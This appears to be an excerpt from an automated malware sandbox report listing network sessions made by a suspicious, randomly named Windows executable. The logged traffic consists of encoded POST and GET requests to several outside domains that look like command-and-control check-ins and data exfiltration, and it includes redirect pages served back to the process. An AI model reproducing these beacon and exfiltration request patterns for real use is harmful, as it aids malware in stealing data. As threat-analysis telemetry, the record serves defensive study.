                                                                        Data Raw: 34 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 74 75 62 65 74 72 65 [TRUNCATED]
                                                                        Data Ascii: 4c8<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.tubetrexhd.buzz/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.tubetrexhd.buzz/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.tubetrexhd.buzz/2t4j?gp=1&js=1&uuid=1731126929.9738454148&other_args=eyJ1cmkiOiAiLzJ0NGoiLCAiYXJncyI6ICJKOExIZ0RKcD03NkJCU0hMZWJNRklueDQxNU1FNW5zYVdBWDd2cXBrRE1LVUlGWHlXSlRqa2NaUXljRmNJcFlEZW5oakoyclQ4OXNQYUxIaXRkbDE4MWd1Wm10Nk1GbHIwZnR2Mjd1TzRCV09GNjVrUk1HRURvQnArQ0FlK0xMTFIyNlU3OHBqVWRRPT0mYUY9SkxwNG8wUXgyRi1wNEYiLCAicmVmZXJlciI6ICIiLCAiYWNjZXB0IjogInRleHQvaHRtbCxhcHBsaWNhdGlvb [TRUNCATED]
                                                                        Nov 9, 2024 05:35:29.320408106 CET156INData Raw: 79 49 36 49 43 49 78 5a 44 67 33 49 69 77 67 49 6d 46 79 5a 33 4e 66 59 79 49 36 49 43 4a 6c 59 6a 41 31 49 69 77 67 49 6e 4a 6c 5a 6d 56 79 5a 58 4a 66 59 79 49 36 49 43 4a 68 4e 6a 67 33 49 69 77 67 49 6d 46 6a 59 32 56 77 64 46 39 6a 49 6a 6f
                                                                        Data Ascii: yI6ICIxZDg3IiwgImFyZ3NfYyI6ICJlYjA1IiwgInJlZmVyZXJfYyI6ICJhNjg3IiwgImFjY2VwdF9jIjogIjUzZDAifQ=="; } </script> </body></html>0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.54991113.248.169.48803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:35:52.675026894 CET740OUTPOST /t61z/ HTTP/1.1
                                                                        Host: www.moneta.life
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.moneta.life
                                                                        Referer: http://www.moneta.life/t61z/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 64 5a 4a 43 4e 47 39 58 6a 37 44 76 41 69 39 65 6a 70 49 6b 7a 47 48 59 77 68 39 59 35 44 6c 42 56 44 4a 53 6b 62 6f 49 63 68 32 69 42 4e 4c 2f 6b 43 34 65 43 32 73 68 78 51 4d 56 41 6b 39 4c 50 36 4f 49 37 4c 63 6a 6b 69 36 4b 45 32 66 31 32 4b 4f 51 4c 39 45 70 33 64 48 53 41 46 52 36 7a 59 6a 53 57 4e 62 78 50 46 4b 7a 30 66 4a 48 65 68 41 72 71 51 4c 51 62 71 68 54 51 68 46 68 72 31 76 66 2b 39 63 63 38 75 53 2b 6f 35 4e 49 79 6d 50 6c 47 4b 53 4e 44 58 7a 48 4b 50 52 74 4c 47 4a 62 2f 67 79 32 55 68 36 66 72 4d 47 75 65 2f 74 64 41 79 38 38 4f 31 51 68 38 39 4f 6c 48 67 42 35 68 69 6f 3d
                                                                        Data Ascii: J8LHgDJp=dZJCNG9Xj7DvAi9ejpIkzGHYwh9Y5DlBVDJSkboIch2iBNL/kC4eC2shxQMVAk9LP6OI7Lcjki6KE2f12KOQL9Ep3dHSAFR6zYjSWNbxPFKz0fJHehArqQLQbqhTQhFhr1vf+9cc8uS+o5NIymPlGKSNDXzHKPRtLGJb/gy2Uh6frMGue/tdAy88O1Qh89OlHgB5hio=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.54992713.248.169.48803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:35:55.222735882 CET760OUTPOST /t61z/ HTTP/1.1
                                                                        Host: www.moneta.life
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.moneta.life
                                                                        Referer: http://www.moneta.life/t61z/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 64 5a 4a 43 4e 47 39 58 6a 37 44 76 42 42 31 65 6d 4b 51 6b 37 47 48 62 38 42 39 59 77 6a 6c 46 56 44 46 53 6b 66 78 54 66 54 43 69 42 74 62 2f 6c 44 34 65 44 32 73 68 2b 77 4d 71 64 30 39 55 50 36 44 31 37 4c 67 6a 6b 6d 71 4b 45 33 76 31 31 35 6d 58 4b 74 45 76 36 39 48 4d 45 46 52 36 7a 59 6a 53 57 4e 66 62 50 42 6d 7a 30 71 5a 48 4d 54 34 71 72 51 4c 54 4e 36 68 54 61 42 45 4a 72 31 76 39 2b 38 41 6c 38 73 71 2b 6f 39 64 49 79 33 50 6d 4a 4b 53 55 65 48 79 6f 46 64 51 6e 42 46 41 4f 33 51 37 7a 56 77 32 5a 6a 61 33 45 45 64 6c 31 54 53 51 45 65 6d 59 57 74 4e 76 4d 64 44 52 4a 2f 31 39 30 50 73 65 63 6c 4f 6b 4c 46 66 48 59 61 78 58 6b 77 39 54 72
                                                                        Data Ascii: J8LHgDJp=dZJCNG9Xj7DvBB1emKQk7GHb8B9YwjlFVDFSkfxTfTCiBtb/lD4eD2sh+wMqd09UP6D17LgjkmqKE3v115mXKtEv69HMEFR6zYjSWNfbPBmz0qZHMT4qrQLTN6hTaBEJr1v9+8Al8sq+o9dIy3PmJKSUeHyoFdQnBFAO3Q7zVw2Zja3EEdl1TSQEemYWtNvMdDRJ/190PseclOkLFfHYaxXkw9Tr


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.54994213.248.169.48803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:35:57.770834923 CET1777OUTPOST /t61z/ HTTP/1.1
                                                                        Host: www.moneta.life
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.moneta.life
                                                                        Referer: http://www.moneta.life/t61z/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 64 5a 4a 43 4e 47 39 58 6a 37 44 76 42 42 31 65 6d 4b 51 6b 37 47 48 62 38 42 39 59 77 6a 6c 46 56 44 46 53 6b 66 78 54 66 54 36 69 42 66 6a 2f 6b 67 51 65 52 47 73 68 33 51 4d 76 64 30 38 4f 50 36 61 2b 37 4c 74 57 6b 6b 69 4b 45 52 7a 31 68 59 6d 58 41 74 45 76 7a 64 48 52 41 46 51 69 7a 59 79 62 57 4e 50 62 50 42 6d 7a 30 74 68 48 50 42 41 71 70 51 4c 51 62 71 68 32 51 68 46 6b 72 31 32 4b 2b 38 55 31 38 64 4b 2b 74 74 4e 49 39 6c 6e 6d 57 36 53 42 66 48 79 77 46 64 63 6b 42 46 74 67 33 54 6e 4a 56 33 36 5a 79 65 7a 48 61 4e 74 71 4f 77 46 6b 65 6d 55 7a 73 72 37 62 56 56 5a 34 2b 48 35 78 43 59 47 6e 70 71 6c 4c 45 4f 36 54 44 6d 76 6e 33 62 69 32 54 69 48 75 70 77 47 68 5a 34 58 58 67 6f 6a 36 54 6d 46 33 4d 35 74 30 73 54 48 35 69 4e 6a 48 53 4e 50 68 6c 71 58 32 69 53 4a 6b 5a 44 4b 45 68 6f 55 4d 69 54 6e 4e 37 66 57 6e 41 58 70 32 41 35 6d 37 53 6c 57 69 71 32 6f 59 78 46 47 6c 2b 4d 44 47 63 65 6c 30 41 4f 4c 38 76 54 45 48 49 6a 6b 38 68 68 70 32 42 71 78 57 48 [TRUNCATED]
                                                                        Data Ascii: J8LHgDJp=dZJCNG9Xj7DvBB1emKQk7GHb8B9YwjlFVDFSkfxTfT6iBfj/kgQeRGsh3QMvd08OP6a+7LtWkkiKERz1hYmXAtEvzdHRAFQizYybWNPbPBmz0thHPBAqpQLQbqh2QhFkr12K+8U18dK+ttNI9lnmW6SBfHywFdckBFtg3TnJV36ZyezHaNtqOwFkemUzsr7bVVZ4+H5xCYGnpqlLEO6TDmvn3bi2TiHupwGhZ4XXgoj6TmF3M5t0sTH5iNjHSNPhlqX2iSJkZDKEhoUMiTnN7fWnAXp2A5m7SlWiq2oYxFGl+MDGcel0AOL8vTEHIjk8hhp2BqxWH/Pj66j9YMvjbVfv6tM9xcUWPhXh1P99Qkwob3lKLAs2ReR8fzbXLXMU2DbZhaWodWK37wJFKx+bBFG/ZOCPky6IMPS5CNjddFD9Qs8gJLi9kdfy57ydfTbX1z8JgVCUBh627FpmFCuxBOyV+sDJYjgMoLaatzOOiXhYQT+Fs1gJcoyoBdXwdHchAlgPfF+KBcmjVtw4YwcGnfrN8fNa+9yUfS50x/WABnfptVCatKKCgfsEY4RzvxdTiGWzs0/Ze1BjhNj5x4olBPAxKMtL6EpJEgRadz0fZE5fiVQDp6A420bZwdGEzKoDqreO1pqusn0fLFvS/9XRIs/hpQoS2AyhVfeMGp5KSkRebDEZ5XfENZ4CJr1z/3WwbwKn3yTqrHYFBTSI18ydZN2aI5YQRxSN4mV1OKN0NmwOSecSTDzsRufeV6xqK7VQjeui2LDROB8EMnpM7s8eaBIYEzZq+9w30UctOUcjAb/B4swonMGhXNmK8UjFxgB2QCtyPDGEYI1ICYNBEU9JVVTCEEFBJU+ga8aMfP8k7l/Fdqxg18fRMk35/p3+dGrhqUV7HwZSPY+kZ2F6qteoCAyF/o31hWnt4gZgK7m+eTY93aupZYPi7DVAaCCDQHthT0J04kepqTJsLs7Kx6KB7BR7OqEH5DafA/x7RZL7Lbg [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.54995613.248.169.48803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:36:00.312486887 CET487OUTGET /t61z/?J8LHgDJp=QbhiOx00h/rFbDhCzcx72F6h1mdg1yJMVj9Qvc8sejmtB5T8qlwycmwhvDAYX2QAFqqRkYoUzkyWExrL+4KEHOogqLXxPl8o8avUe8e/R2yv7tJPERVtmQXUL45HQRgD9g==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.moneta.life
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:36:01.353607893 CET414INHTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Sat, 09 Nov 2024 04:36:01 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 274
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4a 38 4c 48 67 44 4a 70 3d 51 62 68 69 4f 78 30 30 68 2f 72 46 62 44 68 43 7a 63 78 37 32 46 36 68 31 6d 64 67 31 79 4a 4d 56 6a 39 51 76 63 38 73 65 6a 6d 74 42 35 54 38 71 6c 77 79 63 6d 77 68 76 44 41 59 58 32 51 41 46 71 71 52 6b 59 6f 55 7a 6b 79 57 45 78 72 4c 2b 34 4b 45 48 4f 6f 67 71 4c 58 78 50 6c 38 6f 38 61 76 55 65 38 65 2f 52 32 79 76 37 74 4a 50 45 52 56 74 6d 51 58 55 4c 34 35 48 51 52 67 44 39 67 3d 3d 26 61 46 3d 4a 4c 70 34 6f 30 51 78 32 46 2d 70 34 46 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?J8LHgDJp=QbhiOx00h/rFbDhCzcx72F6h1mdg1yJMVj9Qvc8sejmtB5T8qlwycmwhvDAYX2QAFqqRkYoUzkyWExrL+4KEHOogqLXxPl8o8avUe8e/R2yv7tJPERVtmQXUL45HQRgD9g==&aF=JLp4o0Qx2F-p4F"}</script></head></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.54998676.223.67.189803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:36:06.456990004 CET767OUTPOST /n1dp/ HTTP/1.1
                                                                        Host: www.mjmegartravel.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.mjmegartravel.online
                                                                        Referer: http://www.mjmegartravel.online/n1dp/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 6d 77 32 68 59 35 52 4b 67 72 31 7a 72 42 6e 4d 43 41 50 36 61 70 53 56 73 50 33 45 34 68 6a 6f 62 66 38 79 72 39 30 6b 4e 48 37 7a 36 41 54 79 2f 4e 68 4a 66 5a 58 49 66 4b 42 6e 69 4d 48 39 7a 43 30 65 67 76 45 46 67 59 6c 45 63 55 78 57 6c 72 50 4d 42 4b 71 4c 2b 35 4e 71 63 57 56 74 59 4d 46 79 31 41 50 58 34 41 36 79 6b 70 54 62 4b 38 30 47 41 64 4e 50 57 5a 6d 44 33 6a 43 44 52 35 69 51 67 4f 76 59 58 4f 72 4f 37 71 73 32 65 71 4d 4f 62 53 51 55 47 57 6d 4f 6b 42 68 75 72 78 6b 4b 64 4d 43 6c 54 4d 77 50 4c 36 75 71 57 79 48 68 67 44 71 6f 64 77 4b 66 79 6c 6b 6c 70 54 63 61 35 51 77 3d
                                                                        Data Ascii: J8LHgDJp=mw2hY5RKgr1zrBnMCAP6apSVsP3E4hjobf8yr90kNH7z6ATy/NhJfZXIfKBniMH9zC0egvEFgYlEcUxWlrPMBKqL+5NqcWVtYMFy1APX4A6ykpTbK80GAdNPWZmD3jCDR5iQgOvYXOrO7qs2eqMObSQUGWmOkBhurxkKdMClTMwPL6uqWyHhgDqodwKfylklpTca5Qw=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.54998776.223.67.189803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:36:09.005014896 CET787OUTPOST /n1dp/ HTTP/1.1
                                                                        Host: www.mjmegartravel.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.mjmegartravel.online
                                                                        Referer: http://www.mjmegartravel.online/n1dp/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 6d 77 32 68 59 35 52 4b 67 72 31 7a 74 6c 62 4d 46 6e 54 36 64 4a 53 57 79 66 33 45 7a 42 6a 73 62 66 77 79 72 35 74 68 4d 31 76 7a 35 6c 2f 79 2b 50 5a 4a 63 5a 58 49 48 61 42 6d 73 73 47 51 7a 43 34 38 67 71 38 46 67 59 78 45 63 51 68 57 6c 62 7a 50 48 61 71 4e 34 35 4e 6f 42 47 56 74 59 4d 46 79 31 41 71 4d 34 41 43 79 6b 35 6a 62 4b 5a 55 5a 4e 39 4e 4f 47 4a 6d 44 39 7a 43 50 52 35 69 2b 67 50 7a 68 58 4e 44 4f 37 6f 45 32 65 62 4d 4e 53 53 51 61 46 6d 6e 6c 68 78 45 2f 6e 43 68 48 41 4e 37 6e 4b 71 41 6b 4b 4d 66 41 4d 51 50 4a 7a 6a 47 51 4e 6a 43 6f 6a 56 46 4d 7a 77 4d 71 6e 48 6b 64 69 66 6c 48 5a 5a 70 42 37 64 79 72 74 49 41 43 4f 6b 56 2b
                                                                        Data Ascii: J8LHgDJp=mw2hY5RKgr1ztlbMFnT6dJSWyf3EzBjsbfwyr5thM1vz5l/y+PZJcZXIHaBmssGQzC48gq8FgYxEcQhWlbzPHaqN45NoBGVtYMFy1AqM4ACyk5jbKZUZN9NOGJmD9zCPR5i+gPzhXNDO7oE2ebMNSSQaFmnlhxE/nChHAN7nKqAkKMfAMQPJzjGQNjCojVFMzwMqnHkdiflHZZpB7dyrtIACOkV+


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.54998876.223.67.189803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:36:11.551778078 CET1804OUTPOST /n1dp/ HTTP/1.1
                                                                        Host: www.mjmegartravel.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.mjmegartravel.online
                                                                        Referer: http://www.mjmegartravel.online/n1dp/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 6d 77 32 68 59 35 52 4b 67 72 31 7a 74 6c 62 4d 46 6e 54 36 64 4a 53 57 79 66 33 45 7a 42 6a 73 62 66 77 79 72 35 74 68 4d 31 33 7a 35 54 72 79 2b 6f 31 4a 64 5a 58 49 5a 4b 42 6a 73 73 48 53 7a 43 67 34 67 72 42 2b 67 61 4a 45 66 33 4a 57 6a 70 58 50 4a 61 71 4e 36 35 4e 72 63 57 56 34 59 4e 70 2b 31 41 36 4d 34 41 43 79 6b 37 4c 62 61 63 30 5a 50 39 4e 50 57 5a 6d 48 33 6a 44 53 52 39 4f 49 67 4f 48 75 57 39 6a 4f 36 49 30 32 4e 5a 30 4e 4b 43 51 59 41 6d 6e 39 68 78 35 6e 6e 42 55 30 41 4e 50 5a 4b 74 73 6b 4c 70 44 64 58 67 50 72 6c 42 50 78 41 56 71 2f 69 42 31 57 39 51 55 51 6d 56 41 38 71 2b 39 61 55 4e 42 41 37 65 6d 37 37 4a 4d 31 48 69 78 2b 63 6e 69 53 50 56 47 69 61 5a 75 35 51 30 6d 78 50 79 48 6c 79 65 51 39 36 67 6f 36 4d 68 45 75 46 6e 6c 45 44 6f 32 4d 41 57 44 34 69 31 73 35 79 33 59 55 36 35 31 53 4b 5a 6a 72 46 33 6f 69 43 57 64 70 56 53 5a 68 71 41 75 4a 66 46 67 6c 65 50 4c 39 78 56 66 4e 6c 6d 38 69 4f 35 2f 6d 62 71 38 57 52 45 42 4a 59 4b 65 48 35 [TRUNCATED]
                                                                        Data Ascii: J8LHgDJp=mw2hY5RKgr1ztlbMFnT6dJSWyf3EzBjsbfwyr5thM13z5Try+o1JdZXIZKBjssHSzCg4grB+gaJEf3JWjpXPJaqN65NrcWV4YNp+1A6M4ACyk7Lbac0ZP9NPWZmH3jDSR9OIgOHuW9jO6I02NZ0NKCQYAmn9hx5nnBU0ANPZKtskLpDdXgPrlBPxAVq/iB1W9QUQmVA8q+9aUNBA7em77JM1Hix+cniSPVGiaZu5Q0mxPyHlyeQ96go6MhEuFnlEDo2MAWD4i1s5y3YU651SKZjrF3oiCWdpVSZhqAuJfFglePL9xVfNlm8iO5/mbq8WREBJYKeH5thow8jVfHGJut2OSair9MoUPuv5ETpIeycPTZn9WENgu8StIZhXST1QgdVXk7cD9gdl1KrB6sF6nu7xZZsdFVI/3jtyQJqbW9NGMqcr9/ougqIhqwNCVsJKkgO0x5vllII9cdr9B8mrq0WR2G2eQL9jDKMfFcfNOzJbjHOY4yXtRD6wel0Ah76T+qKDklEqt/VFFP9TC7JBHGjYbVpFseDf19DTYVf87k5elr3ii3y0PbOwAtJgthYs3hGV6b91BApJXLVzoDAqore8KCL26LAGJrxotQZqeXIzB/TCdtxMijqo+nULXg4IqA1z+2LEcPm7yOFffnFLlFDFQG9DaMrr/M0ff5SUUQ6MwpkXSq3Lp8PpcuocZgWODM/1KjUMo26e7/bXcy/d1e0TBAyKovYhBUrksneKOgFy2gfhrCckWTtIrCE2Rc6w38BwQ27f7yLFjfXXj5SgL6fVNlMhIv/MXcL60ATF2oYewtPZkyQQg/3BAvRLSSB/PgNdOJF++CQo2X5AJQNf6NHAcpOd/7nPHeeHNKKTxU65F4htI4Fva/q/JTOyUYkbIwgwBgH600e6SZSgs8nMvplKZ62Og/7mKQ9G3DRKLAtZdXfMds8pyk2HPdq6wnUP/RS61DTahjOvWLIGy/L5lQmmV3pBw2HdQaypue4wsVW [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.54998976.223.67.189803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:36:14.290581942 CET496OUTGET /n1dp/?J8LHgDJp=ryeBbJYUvalC4Gf2UXy7Qc/r17vTzADlU+kriaheCGn+31zAxY9EcJfSGqt2t+ma9yg9hIhC3ppYERZTlK/9H+6asqo2CGRUX6V95R7Z3XOuyoyAAN44PtQ+X9f95w6KKw==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.mjmegartravel.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:36:15.160938025 CET414INHTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Sat, 09 Nov 2024 04:36:15 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 274
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4a 38 4c 48 67 44 4a 70 3d 72 79 65 42 62 4a 59 55 76 61 6c 43 34 47 66 32 55 58 79 37 51 63 2f 72 31 37 76 54 7a 41 44 6c 55 2b 6b 72 69 61 68 65 43 47 6e 2b 33 31 7a 41 78 59 39 45 63 4a 66 53 47 71 74 32 74 2b 6d 61 39 79 67 39 68 49 68 43 33 70 70 59 45 52 5a 54 6c 4b 2f 39 48 2b 36 61 73 71 6f 32 43 47 52 55 58 36 56 39 35 52 37 5a 33 58 4f 75 79 6f 79 41 41 4e 34 34 50 74 51 2b 58 39 66 39 35 77 36 4b 4b 77 3d 3d 26 61 46 3d 4a 4c 70 34 6f 30 51 78 32 46 2d 70 34 46 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?J8LHgDJp=ryeBbJYUvalC4Gf2UXy7Qc/r17vTzADlU+kriaheCGn+31zAxY9EcJfSGqt2t+ma9yg9hIhC3ppYERZTlK/9H+6asqo2CGRUX6V95R7Z3XOuyoyAAN44PtQ+X9f95w6KKw==&aF=JLp4o0Qx2F-p4F"}</script></head></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.549990172.217.16.211803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:36:20.215183020 CET758OUTPOST /q6od/ HTTP/1.1
                                                                        Host: www.digitaladpro.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.digitaladpro.shop
